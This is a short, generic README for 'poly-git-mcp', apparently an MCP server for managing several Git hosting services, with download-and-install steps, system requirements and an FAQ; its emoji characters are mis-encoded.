poly-git-mcp
Unified MCP server for Git forge management across GitHub, GitLab, Gitea, and Bitbucket, enabling repository, issue, PR, and CI/CD operations via CLI tools and APIs.
README
π poly-git-mcp - Manage Your Git Services Easily
Welcome to poly-git-mcp! This application helps you manage multiple Git services like GitHub, GitLab, Gitea, and Bitbucket from a single unified server. Experience simple tools that save you time and effort in handling your Git repositories.
π οΈ Features
- Unified Management: Access all your Git services in one place.
- Easy Setup: Get started quickly with straightforward instructions.
- Cross-Platform Compatibility: Works on Windows, macOS, and Linux.
- Robust Functionality: Supports a variety of operations for successful integration.
π¦ Download & Install
Download Link
To download the latest version of poly-git-mcp, visit this page to download: GitHub Releases.
Installation Steps
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Visit the Releases Page
Go to the following link to find the latest release: GitHub Releases. -
Select the Right Version
Look for the latest version at the top of the page. It will be marked with a tag (e.g., v1.0). Click on the version to see all available files. -
Download the Application
Once youβre on the version page, choose the appropriate file for your operating system:- For Windows, download the
.exefile. - For macOS, download the
.dmgfile. - For Linux, download the
.tar.gzfile.
- For Windows, download the
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Run the Installer
After downloading, locate the file in your Downloads folder. Double-click the file to start the installation process. Follow the prompts on your screen to complete the setup. -
Start Using poly-git-mcp
After the installation is complete, launch the application. You will see a welcome screen guiding you through the initial setup.
π Getting Started
Initial Setup
- Configuration: Upon first launch, youβll need to configure your Git services.
- Connecting Services: Follow the on-screen instructions to connect your GitHub, GitLab, Gitea, or Bitbucket accounts. You may need API keys for some services.
- Exploring Features: Familiarize yourself with the interface. Check the available tools to manage your repositories.
System Requirements
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Operating System:
- Windows 10 or later
- macOS Sierra (10.12) or later
- Any modern Linux distribution
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Memory: A minimum of 4 GB RAM is recommended.
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Disk Space: At least 100 MB of free space.
π€ Frequently Asked Questions
How do I update the application?
To update, revisit the Releases page and download the latest version. Follow the same installation steps as before.
I have issues with installation. What should I do?
Ensure you have the correct file for your operating system. If problems persist, check our support page for troubleshooting tips.
Can I contribute to this project?
Yes! Contributions are welcome. Check our Contribution Guidelines for more information.
π§βπ« Additional Resources
π Quick Links
We hope you enjoy using poly-git-mcp to simplify your Git management tasks!
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